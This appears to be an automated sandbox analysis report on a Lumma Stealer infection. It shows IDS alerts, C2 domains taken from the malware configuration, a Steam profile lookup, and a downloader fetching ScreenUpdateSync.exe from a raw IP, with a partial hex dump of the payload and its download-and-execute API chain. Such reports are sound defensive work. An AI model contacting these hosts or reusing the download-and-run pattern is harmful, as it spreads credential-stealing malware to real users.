Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov ecx, dword ptr [0044C548h]	7_2_02138809
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	7_2_02127887
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	7_2_02127887
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	7_2_0214B8B5
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	7_2_021358FA
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov ecx, eax	7_2_02160E12
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	7_2_0214EE1A
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov dword ptr [ebx], 00000022h	7_2_0214BE07
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	7_2_0214EE08
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]	7_2_0213BE2C
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov ebx, edx	7_2_0214DE57
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh	7_2_02162F87
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then test esi, esi	7_2_0215CC07
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then jmp eax	7_2_02161C3E
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov ecx, eax	7_2_0212AC99
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	7_2_0214ECC9
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov ebx, eax	7_2_02125D17
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov ebp, eax	7_2_02125D17
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov ecx, eax	7_2_02136D15
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]	7_2_02145D57
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	7_2_0214BD67
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	7_2_0213AD91
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	7_2_0213BD88
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	7_2_0214EDC6

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2059049 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop) : 192.168.2.11:56135 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059043 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop) : 192.168.2.11:61343 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059057 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop) : 192.168.2.11:53151 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059041 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop) : 192.168.2.11:56412 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059035 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop) : 192.168.2.11:57398 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059051 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop) : 192.168.2.11:55202 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059039 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop) : 192.168.2.11:62856 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059037 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop) : 192.168.2.11:50434 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059088 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (skidjazzyric .click) : 192.168.2.11:53943 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.11:49730 -> 104.102.49.254:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: versersleep.shop
Source: Malware configuration extractor	URLs: femalsabler.shop
Source: Malware configuration extractor	URLs: chipdonkeruz.shop
Source: Malware configuration extractor	URLs: handscreamny.shop
Source: Malware configuration extractor	URLs: crowdwarek.shop
Source: Malware configuration extractor	URLs: soundtappysk.shop
Source: Malware configuration extractor	URLs: apporholis.shop
Source: Malware configuration extractor	URLs: skidjazzyric.click
Source: Malware configuration extractor	URLs: robinsharez.shop

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 12 Jan 2025 16:47:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 12 Jan 2025 16:45:01 GMTETag: "62a00-62b850c908464"Accept-Ranges: bytesContent-Length: 403968Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ec be f9 b4 a8 df 97 e7 a8 df 97 e7 a8 df 97 e7 b6 8d 13 e7 89 df 97 e7 b6 8d 02 e7 bc df 97 e7 b6 8d 14 e7 c4 df 97 e7 8f 19 ec e7 ab df 97 e7 a8 df 96 e7 d9 df 97 e7 b6 8d 1d e7 a9 df 97 e7 b6 8d 03 e7 a9 df 97 e7 b6 8d 06 e7 a9 df 97 e7 52 69 63 68 a8 df 97 e7 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 f9 fd 95 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 36 04 00 00 70 08 00 00 00 00 00 b7 14 00 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 0c 00 00 04 00 00 02 17 07 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc 69 04 00 28 00 00 00 00 80 0b 00 10 69 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 04 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 34 04 00 00 10 00 00 00 36 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 56 22 00 00 00 50 04 00 00 24 00 00 00 3a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 7c 06 00 00 80 04 00 00 16 00 00 00 5e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 6f 73 75 00 00 00 e5 53 00 00 00 00 0b 00 00 48 00 00 00 74 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6d 75 77 61 76 00 00 5a 01 00 00 00 60 0b 00 00 02 00 00 00 bc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 6f 78 61 68 00 00 0c 00 00 00 00 70 0b 00 00 02 00 00 00 be 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 10 69 01 00 00 80 0b 00 00 6a 01 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: Joe Sandbox View	IP Address: 172.67.179.207 172.67.179.207
Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49730 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49709 -> 176.113.115.19:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49707 -> 172.67.179.207:443

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19

Source: C:\Users\user\Desktop\NDWffRLk7z.exe

Code function: 4_2_004029EA InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

4_2_004029EA

Source: global traffic	HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19

Source: 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=505255d87a2bf729c137c289; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresConten equals www.youtube.com (Youtube)
Source: 89AC.tmp.exe, 00000007.00000003.1381500917.0000000000813000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=505255d87a2bf729c137c289; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25665Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSun, 12 Jan 2025 16:47:10 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: post-to-me.com
Source: global traffic	DNS traffic detected: DNS query: skidjazzyric.click
Source: global traffic	DNS traffic detected: DNS query: soundtappysk.shop
Source: global traffic	DNS traffic detected: DNS query: femalsabler.shop
Source: global traffic	DNS traffic detected: DNS query: apporholis.shop
Source: global traffic	DNS traffic detected: DNS query: crowdwarek.shop
Source: global traffic	DNS traffic detected: DNS query: versersleep.shop
Source: global traffic	DNS traffic detected: DNS query: chipdonkeruz.shop
Source: global traffic	DNS traffic detected: DNS query: handscreamny.shop
Source: global traffic	DNS traffic detected: DNS query: robinsharez.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com

Source: 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: NDWffRLk7z.exe, 00000004.00000003.1341587383.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.1
Source: NDWffRLk7z.exe, 00000004.00000003.1341587383.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/
Source: NDWffRLk7z.exe, 00000004.00000003.1341587383.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
Source: NDWffRLk7z.exe, 00000004.00000002.3750636895.0000000000628000.00000004.00000020.00020000.00000000.sdmp, NDWffRLk7z.exe, 00000004.00000003.3617507302.0000000000628000.00000004.00000020.00020000.00000000.sdmp, NDWffRLk7z.exe, 00000004.00000003.1341587383.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe#
Source: NDWffRLk7z.exe, 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARE
Source: NDWffRLk7z.exe, 00000004.00000002.3750636895.0000000000628000.00000004.00000020.00020000.00000000.sdmp, NDWffRLk7z.exe, 00000004.00000003.3617507302.0000000000628000.00000004.00000020.00020000.00000000.sdmp, NDWffRLk7z.exe, 00000004.00000003.1341587383.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeT
Source: NDWffRLk7z.exe, 00000004.00000003.1341587383.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exean
Source: NDWffRLk7z.exe, 00000004.00000003.1341587383.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exek
Source: NDWffRLk7z.exe, 00000004.00000003.1341587383.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeom
Source: NDWffRLk7z.exe, 00000004.00000003.1341587383.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exep
Source: NDWffRLk7z.exe, 00000004.00000003.1341587383.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exev8
Source: 89AC.tmp.exe, 00000007.00000002.1601827607.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000863000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 89AC.tmp.exe, 00000007.00000002.1601827607.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000863000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 89AC.tmp.exe, 00000007.00000002.1601827607.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000863000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.10.dr	String found in binary or memory: http://upx.sf.net
Source: 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: 89AC.tmp.exe, 00000007.00000002.1601827607.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602215869.0000000000861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=SCXpgixTDzt4&a
Source: 89AC.tmp.exe, 00000007.00000003.1382256815.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
